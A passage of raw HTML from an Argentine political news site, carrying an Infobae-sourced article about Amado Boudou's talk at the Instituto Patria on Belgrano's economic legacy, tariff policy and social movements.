		<form method="get" class="search-form" action="https://bairesparatodos.com.ar/inicio/">
			<label>
				<span class="screen-reader-text">Search for:</span>

								<input id="penci-header-search" type="search" class="search-field" placeholder="Enter keyword..." value="" name="s" autocomplete="off">
			</label>
			<button type="submit" class="search-submit">
				<i class="fa fa-search"></i>
				<span class="screen-reader-text">Search</span>
			</button>
		</form>
		<div class="penci-ajax-search-results">
			<div id="penci-ajax-search-results-wrapper" class="penci-ajax-search-results-wrapper"></div>
		</div>
	</div>
</div>		</div>
	
			<div class="header__social-media">
			<div class="header__content-social-media">

			<a class="social-media-item socail_media__facebook" target="_blank" href="https://www.facebook.com/baires.paratodos/" title="Facebook" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-facebook"></i><span class="social_title screen-reader-text">Facebook</span></span></a><a class="social-media-item socail_media__twitter" target="_blank" href="https://twitter.com/BairesParaTodos" title="Twitter" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-twitter"></i><span class="social_title screen-reader-text">Twitter</span></span></a><a class="social-media-item socail_media__instagram" target="_blank" href="https://www.instagram.com/bairesparatodosok/" title="Instagram" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-instagram"></i><span class="social_title screen-reader-text">Instagram</span></span></a><a class="social-media-item socail_media__youtube" target="_blank" href="https://www.youtube.com/channel/UCo1MwzAaMSo9_dW0l1dtawA" title="Youtube" rel="noopener"><span class="socail-media-item__content"><i class="fa fa-youtube-play"></i><span class="social_title screen-reader-text">Youtube</span></span></a>						</div>
		</div>
	
</div>

	</div>
</header><!-- #masthead -->
</div><div class="penci-header-mobile" >
	<div class="penci-header-mobile_container">
		<button class="menu-toggle navbar-toggle" aria-expanded="false"><span class="screen-reader-text">Primary Menu</span><i class="fa fa-bars"></i></button>
								<div class="site-branding"><a href="https://bairesparatodos.com.ar/inicio/" class="custom-logo-link" rel="home"><img width="300" height="85" src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2017/09/baires-e1505139958447.png" class="custom-logo" alt="Baires Para Todos" loading="lazy" /></a></div>
									<div class="header__search-mobile header__search" id="top-search-mobile">
				<a class="search-click"><i class="fa fa-search"></i></a>
				<div class="show-search">
					<div class="show-search__content">
						<form method="get" class="search-form" action="https://bairesparatodos.com.ar/inicio/">
							<label>
								<span class="screen-reader-text">Search for:</span>
																<input  type="text" id="penci-search-field-mobile" class="search-field penci-search-field-mobile" placeholder="Enter keyword..." value="" name="s" autocomplete="off">
							</label>
							<button type="submit" class="search-submit">
								<i class="fa fa-search"></i>
								<span class="screen-reader-text">Search</span>
							</button>
						</form>
						<div class="penci-ajax-search-results">
							<div class="penci-ajax-search-results-wrapper"></div>
							<div class="penci-loader-effect penci-loading-animation-9"> <div class="penci-loading-circle"> <div class="penci-loading-circle1 penci-loading-circle-inner"></div> <div class="penci-loading-circle2 penci-loading-circle-inner"></div> <div class="penci-loading-circle3 penci-loading-circle-inner"></div> <div class="penci-loading-circle4 penci-loading-circle-inner"></div> <div class="penci-loading-circle5 penci-loading-circle-inner"></div> <div class="penci-loading-circle6 penci-loading-circle-inner"></div> <div class="penci-loading-circle7 penci-loading-circle-inner"></div> <div class="penci-loading-circle8 penci-loading-circle-inner"></div> <div class="penci-loading-circle9 penci-loading-circle-inner"></div> <div class="penci-loading-circle10 penci-loading-circle-inner"></div> <div class="penci-loading-circle11 penci-loading-circle-inner"></div> <div class="penci-loading-circle12 penci-loading-circle-inner"></div> </div> </div>						</div>
					</div>
				</div>
			</div>
			</div>
</div>	<div id="content" class="site-content">
	<div id="primary" class="content-area">
		<main id="main" class="site-main" >
			
			<div class="entry-media penci-entry-media">
			<div class="post-format-meta "><div class="penci-jarallax"><img class="jarallax-img" src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2022/06/FWIWvlLWQAIQLij.jpg" alt="Image default"></div></div>		</div>
	<div class="penci-container">
	<div class="penci-container__content  penci-con_sb2_sb1 ">
		<div class="penci-wide-content penci-content-novc penci-sticky-content penci-content-single-inner">
			<div class="theiaStickySidebar">
			<div class="penci-content-post noloaddisqus" data-url="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" data-id="171813" data-title="">
									<article id="post-171813" class="penci-single-artcontent post-171813 post type-post status-publish format-standard has-post-thumbnail hentry category-las-mas-leidas category-politica tag-amado-boudou penci-post-item">
						<header class="entry-header penci-entry-header penci-title-">
							<div class="penci-entry-categories"><span class="penci-cat-links"><a href="https://bairesparatodos.com.ar/inicio/category/las-mas-leidas/" rel="category tag">Las mas leidas</a> <a href="https://bairesparatodos.com.ar/inicio/category/politica/" rel="category tag">Política</a></span></div><h1 class="entry-title penci-entry-title penci-title-">Amado Boudou: “Los movimientos sociales tienen poco que ver con el peronismo”</h1>
							<div class="entry-meta penci-entry-meta">
								<span class="entry-meta-item penci-posted-on"><i class="fa fa-clock-o"></i><time class="entry-date published" datetime="2022-06-25T19:28:22-03:00">25 junio, 2022</time><time class="updated" datetime="2022-06-25T19:28:29-03:00">25 junio, 2022</time></span>							</div><!-- .entry-meta -->
													</header><!-- .entry-header -->
						<div class="penci-entry-content entry-content">
	
<p><strong>El ex vicepresidente K dio una charla en el Instituto Patria, recordó el legado económico de Manuel Belgrano y comparó al prócer con Néstor y Cristina Kirchner.</strong></p>



<p>El ex vicepresidente de la Nación,&nbsp;<strong>Amado Boudou</strong>, participó en un homenaje que el&nbsp;<strong>Instituto Patria</strong>&nbsp;realizó a&nbsp;<strong>Manuel Belgrano</strong>. Allí, el economista, que se encuentra procesado y condenado -hoy en libertad condicional-, disertó sobre el legado y la vigencia del pensamiento económico del creador de la bandera.&nbsp;<strong>Para Boudou “hay un hilo entre las ideas de Belgrano, Perón, Néstor y Cristina”.</strong></p>



<p>El ex ministro de Economía analizó la situación económica actual del país, elogió a la vicepresidenta, Cristina Fernández de Kirchner, por su crítica a los movimientos sociales y cuestionó los aumentos de tarifas. Lo acompañaron&nbsp;<strong>Oscar Parrilli</strong>, senador Nacional del FdT,&nbsp;<strong>Jessica Belgrano</strong>, chozna del prócer.</p>



<p>Boudou&nbsp;<strong>cuestionó la política de segmentación de tarifas</strong>&nbsp;que implementará el Gobierno nacional.&nbsp;<strong>“Es un Caballo de Troya para aumentar las tarifas a todos. Hay que ponerle impuesto a quien calefacciona la pileta y dejar la tarifa plana a todos”</strong>, apuntó el economista.</p>



<p>En ese eje, el ex vicepresidente advirtió que&nbsp;<strong>“el Fondo Monetario Internacional pretende un aumento masivo de tarifas”.</strong>&nbsp;En pleno debate a nivel nacional sobre la actualización del valor de la energía, Boudou insistió en la idea de no descongelar los precios de los servicios públicos.&nbsp;<strong>“Es sorpresivo que haya compañeros y compañeras que no puedan pronunciar la palabra subsidio”</strong>, interpeló el economista.</p>



<p>“Con el esquema de tarifas de los 12 años de Néstor y Cristina no sólo las familias podían acceder a los servicios públicos, sino que el entramado productivo pudo funcionar adecuadamente porque tenían tarifas baratas”, elogió Boudou.</p>



<p><strong>La crítica de Boudou a los movimientos sociales y a la política económica</strong></p>



<p>Consultado por el público sobre qué problemas de la estructura económica actual identifica, el ex vicepresidente señaló que&nbsp;<strong>“Argentina tiene una necesidad de una mejor distribución del ingreso”.</strong></p>



<p>En ese punto, el economista rememoró que Belgrano hacía hincapié en la igualdad y la intervención del Estado en el comercio interior y el exterior. “El pensamiento económico belgraniano tiene ideas que nos iluminan desde el fondo de la historia y forman parte del acervo nacional y popular de la historia”, consideró.</p>



<p>El 20 de junio, la vicepresidenta encabezó un acto en Avellaneda, con motivo de homenajear a Belgrano. Durante su discurso, CFK cuestionó a los movimientos sociales y apuntó contra el presidente por la “tercerización de los planes sociales”.</p>



<p>El ex titular de la ANSES recogió el guante y no ahorró críticas a esas organizaciones.&nbsp;<strong>“Los movimientos sociales tienen poco que ver con el peronismo”</strong>, lanzó. En consonancia, Parrili señaló que<strong>&nbsp;“los planes sociales no son peronistas, sino que son la consecuencia del neoliberalismo”.</strong></p>



<p>En tanto, Boudou explicó que la “economía popular es un paliativo” y cuando se institucionaliza, “es una tragedia” porque separa a esa gestión económica de otra que “es para ricos” y genera “estratificación”.</p>



<p><strong>La comparación de Belgrano con Néstor y Cristina</strong></p>



<p>Al comienzo de su intervención, el ex vicepresidente enumeró las raíces del pensamiento económico belgraniano. Boudou detalló el interés de Belgrano por la igualdad y por fomentar el crecimiento a través de la demanda (mercado interno).</p>



<p><strong>“Todos estos temas aparecen en el pensamiento de Cristina con mucha vigencia y fuerza”</strong>, elogió el economista y comparó: “Belgrano se preocupó por el tema distributivo. Pensaba que la demanda era la fuerza motriz de las sociedades”.</p>



<p>En ese contexto, Boudou llamó la atención sobre la “grave concentración de la riqueza” y destacó que el&nbsp;<strong>Aporte Solidario a las grandes fortunas</strong>, impulsado por los diputados&nbsp;<strong>Máximo Kirchner</strong>&nbsp;y&nbsp;<strong>Carlos Heller</strong>&nbsp;<strong>“fue un hecho revolucionario”</strong>.</p>



<p>A partir de ese argumento, el ex titular de la ANSES resaltó que Argentina tiene&nbsp;<strong>“un problema distributivo severo”&nbsp;</strong>y objetó: “Crecimos al 10%, pero la pobreza disminuyó un 4%”.</p>



<p>En otro tramo de su ponencia, el dirigente cruzó a los economistas que avalan la teoría del derrame y defienden el libre mercado.&nbsp;<strong>“Para los que no saben nada de economía, si repetis las palabras oferta y demanda muchas veces, te convertís en un sabio con espacio en la televisión”&nbsp;</strong>y remató en una clara alusión a&nbsp;<strong>Javier Milei: “Hasta quizás podés proponer que haya venta de órganos”.</strong></p>



<p>Cabe recordar que&nbsp;<strong>Boudou fue procesado y condenado por su participación en el caso Ciccone.</strong>&nbsp;Desde el inicio de la pandemia de Coronavirus estuvo en prisión domiciliaria y en julio de 2021 obtuvo la&nbsp;<strong>libertad condicional</strong>. No obstante, está&nbsp;<strong>inhabilitado para volver a ejercer cargos públicos.</strong></p>



<p>Las declaraciones del dirigente fueron escuchadas con atención por un auditorio con unos 300 militantes del kirchnerismo. El Patria, usina central del cristinismo, organiza con frecuencias seminarios y jornadas de esas características, en las que convocan a dirigentes del espacio a exponer sobre temas coyunturales, históricos y sociales.</p>



<p>En esta ocasión, la convocatoria estuvo abierta en las redes sociales, aunque se requería una inscripción previa vía correo electrónico. Ante la consulta de Infobae, desde el Patria informaron que se trataba de “una charla interna para la comisión de juventudes” del Instituto.</p>



<p><strong>Fuente: Infobae</strong></p>
</div><!-- .entry-content -->						<footer class="penci-entry-footer">
							<span class="penci-social-buttons penci-social-share-footer"><a href="#" class="penci-post-like penci_post-meta_item  single-like-button penci-social-item like" data-post_id="171813" title="Like" data-like="Like" data-unlike="Unlike"><i class="fa fa-thumbs-o-up"></i><span class="penci-share-number">0</span></a><a class="penci-social-item facebook" target="_blank" rel="noopener" title="" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F"><i class="fa fa-facebook"></i></a><a class="penci-social-item twitter" target="_blank" rel="noopener" title="" href="https://twitter.com/intent/tweet?text=Amado%20Boudou:%20“Los%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo”%20-%20https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/"><i class="fa fa-twitter"></i></a><a class="penci-social-item google_plus" target="_blank" rel="noopener" title="" href="https://plus.google.com/share?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F"><i class="fa fa-google-plus"></i></a><a class="penci-social-item pinterest" target="_blank" rel="noopener" title="" href="http://pinterest.com/pin/create/button?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&#038;media=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Fwp-content%2Fuploads%2F2022%2F06%2FFWIWvlLWQAIQLij.jpg&#038;description=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D"><i class="fa fa-pinterest"></i></a><a class="penci-social-item linkedin" target="_blank" rel="noopener" title="" href="https://www.linkedin.com/shareArticle?mini=true&#038;url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&#038;title=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D"><i class="fa fa-linkedin"></i></a><a class="penci-social-item tumblr" target="_blank" rel="noopener" title="" href="https://www.tumblr.com/share/link?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&#038;name=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D"><i class="fa fa-tumblr"></i></a><a class="penci-social-item reddit" target="_blank" rel="noopener" title="" href="https://reddit.com/submit?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&#038;title=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D"><i class="fa fa-reddit"></i></a><a class="penci-social-item telegram" target="_blank" rel="noopener" title="" href="https://telegram.me/share/url?url=https%3A%2F%2Fbairesparatodos.com.ar%2Finicio%2Famado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo%2F&#038;text=Amado%20Boudou%3A%20%E2%80%9CLos%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo%E2%80%9D"><i class="fa fa-telegram"></i></a><a class="penci-social-item email" target="_blank" rel="noopener" href="mailto:?subject=Amado%20Boudou:%20“Los%20movimientos%20sociales%20tienen%20poco%20que%20ver%20con%20el%20peronismo”&#038;BODY=https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/"><i class="fa fa-envelope"></i></a></span>						</footer><!-- .entry-footer -->
					</article>
						<div class="penci-post-pagination">
					<div class="prev-post">
									<div class="prev-post-inner penci_mobj__body">
						<div class="prev-post-title">
							<span><i class="fa fa-angle-left"></i>previous post</span>
						</div>
						<div class="pagi-text">
							<h5 class="prev-title"><a href="https://bairesparatodos.com.ar/inicio/la-nueva-sesion-de-fotos-de-larissa-riquelme/">La nueva sesión de fotos de Larissa Riquelme</a></h5>
						</div>
					</div>
				
			</div>
		
			</div>
<div id="wordpress-171813-comment" class="active multi-wordpress-comment penci-tab-pane" ><div class="post-comments  post-comments-171813  no-comment-yet" id="comments">
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title"><span>Leave a Comment</span> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/#respond" style="display:none;">Cancel Reply</a></small></h3><form action="https://bairesparatodos.com.ar/inicio/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-form-comment"><textarea id="comment" name="comment" cols="45" rows="8" placeholder="Your Comment" aria-required="true"></textarea></p><p class="comment-form-author"><input id="author" name="author" type="text" value="" placeholder="Name*" size="30" aria-required='true' /></p>
<p class="comment-form-email"><input id="email" name="email" type="text" value="" placeholder="Email*" size="30" aria-required='true' /></p>
<p class="comment-form-url"><input id="url" name="url" type="text" value="" placeholder="Website" size="30" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><span>Save my name, email, and website in this browser for the next time I comment.</span></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Submit" /> <input type='hidden' name='comment_post_ID' value='171813' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	</div> <!-- end comments div -->
</div>			</div>
						</div>
		</div>
			<aside class="widget-area widget-area-2 penci-sticky-sidebar penci-sidebar-widgets">
		<div class="theiaStickySidebar">
		
<div id="wpp-2" class="widget  penci-block-vc penci-widget-sidebar style-title-9 style-title-left popular-posts">
<div class="penci-block-heading"><h4 class="widget-title penci-block__title"><span>Las más leidas</span></h4></div>


<ul class="wpp-list wpp-list-with-thumbnails">
<li>
<a href="https://bairesparatodos.com.ar/inicio/el-movimiento-evita-prepara-candidatos-propios-a-la-espera-de-una-paso-en-el-frente-de-todos/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/el-movimiento-evita-prepara-candidatos-propios-a-la-espera-de-una-paso-en-el-frente-de-todos/" class="wpp-post-title" target="_self">El Movimiento Evita prepara candidatos propios a la espera de una PASO en el Frente de Todos</a>
</li>
<li>
<a href="https://bairesparatodos.com.ar/inicio/l-gante-festejo-tras-haber-sido-reconocido-por-su-aporte-a-la-musica-y-la-cultura/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/l-gante-festejo-tras-haber-sido-reconocido-por-su-aporte-a-la-musica-y-la-cultura/" class="wpp-post-title" target="_self">L-Gante festejó tras haber sido reconocido por su aporte a la música y la cultura</a>
</li>
<li>
<a href="https://bairesparatodos.com.ar/inicio/emilio-monzo-macri-tiene-muchas-posibilidades-de-volver-si-no-construimos-una-alternativa/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/emilio-monzo-macri-tiene-muchas-posibilidades-de-volver-si-no-construimos-una-alternativa/" class="wpp-post-title" target="_self">Emilio Monzó: “Macri tiene muchas posibilidades de volver si no construimos una alternativa”</a>
</li>
<li>
<a href="https://bairesparatodos.com.ar/inicio/se-mantiene-la-ventaja-de-lula-sobre-bolsonaro-a-100-dias-de-las-elecciones-presidenciales/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/se-mantiene-la-ventaja-de-lula-sobre-bolsonaro-a-100-dias-de-las-elecciones-presidenciales/" class="wpp-post-title" target="_self">Se mantiene la ventaja de Lula sobre Bolsonaro a 100 días de las elecciones presidenciales</a>
</li>
<li class="current">
<a href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171813-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/amado-boudou-los-movimientos-sociales-tienen-poco-que-ver-con-el-peronismo/" class="wpp-post-title" target="_self">Amado Boudou: “Los movimientos sociales tienen poco que ver con el peronismo”</a>
</li>
</ul>

</div>
<div id="custom_html-2" class="widget_text widget  penci-block-vc penci-widget-sidebar style-title-9 style-title-left widget_custom_html"><div class="textwidget custom-html-widget"><a class="twitter-timeline"  href="https://twitter.com/BairesParaTodos" data-widget-id="287670268149776384">Tweets por @BairesParaTodos</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></div></div><div id="custom_html-4" class="widget_text widget  penci-block-vc penci-widget-sidebar style-title-9 style-title-left widget_custom_html"><div class="textwidget custom-html-widget"><img 
src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2021/08/bairesreda.png" alt="" title="" />

<a href="http://www.jorgeasisdigital.com/"><img 
src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/2021/08/ja.png
" alt="" title="" /></a>


<a href="http://elpais.com/elpais/portada_america.html"><img 
src="http://bairesparatodos.com.ar/inicio/wp-content/uploads/2015/10/logo-el-pais_0.jpg
" alt="" title="" /></a></div></div>		</div>
	</aside><!-- #secondary -->
			
<aside class="widget-area widget-area-1 penci-sticky-sidebar penci-sidebar-widgets">
	<div class="theiaStickySidebar">
	
<div id="wpp-2" class="widget  penci-block-vc penci-widget-sidebar style-title-9 style-title-left popular-posts">
<div class="penci-block-heading"><h4 class="widget-title penci-block__title"><span>Las más leidas</span></h4></div>


<ul class="wpp-list wpp-list-with-thumbnails">
<li>
<a href="https://bairesparatodos.com.ar/inicio/el-movimiento-evita-prepara-candidatos-propios-a-la-espera-de-una-paso-en-el-frente-de-todos/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171777-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/el-movimiento-evita-prepara-candidatos-propios-a-la-espera-de-una-paso-en-el-frente-de-todos/" class="wpp-post-title" target="_self">El Movimiento Evita prepara candidatos propios a la espera de una PASO en el Frente de Todos</a>
</li>
<li>
<a href="https://bairesparatodos.com.ar/inicio/l-gante-festejo-tras-haber-sido-reconocido-por-su-aporte-a-la-musica-y-la-cultura/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171780-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/l-gante-festejo-tras-haber-sido-reconocido-por-su-aporte-a-la-musica-y-la-cultura/" class="wpp-post-title" target="_self">L-Gante festejó tras haber sido reconocido por su aporte a la música y la cultura</a>
</li>
<li>
<a href="https://bairesparatodos.com.ar/inicio/emilio-monzo-macri-tiene-muchas-posibilidades-de-volver-si-no-construimos-una-alternativa/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171786-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/emilio-monzo-macri-tiene-muchas-posibilidades-de-volver-si-no-construimos-una-alternativa/" class="wpp-post-title" target="_self">Emilio Monzó: “Macri tiene muchas posibilidades de volver si no construimos una alternativa”</a>
</li>
<li>
<a href="https://bairesparatodos.com.ar/inicio/se-mantiene-la-ventaja-de-lula-sobre-bolsonaro-a-100-dias-de-las-elecciones-presidenciales/" target="_self"><img src="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80.jpg" srcset="https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80.jpg, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@1.5x.jpg 1.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@2x.jpg 2x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@2.5x.jpg 2.5x, https://bairesparatodos.com.ar/inicio/wp-content/uploads/wordpress-popular-posts/171804-featured-80x80@3x.jpg 3x"  width="80" height="80" alt="" class="wpp-thumbnail wpp_featured wpp_cached_thumb" loading="lazy" /></a>
<a href="https://bairesparatodos.com.ar/inicio/se-mantiene-la-ventaja-de-lula-sobre-bolsonaro-a-100-dias-de-las-elecciones-presidenciales/" class="wpp-post-title" target="_self">Se mantiene la ventaja de Lula sobre Bolsonaro a 100 días de las elecciones presidenciales</a>
</li>
<li class="current">
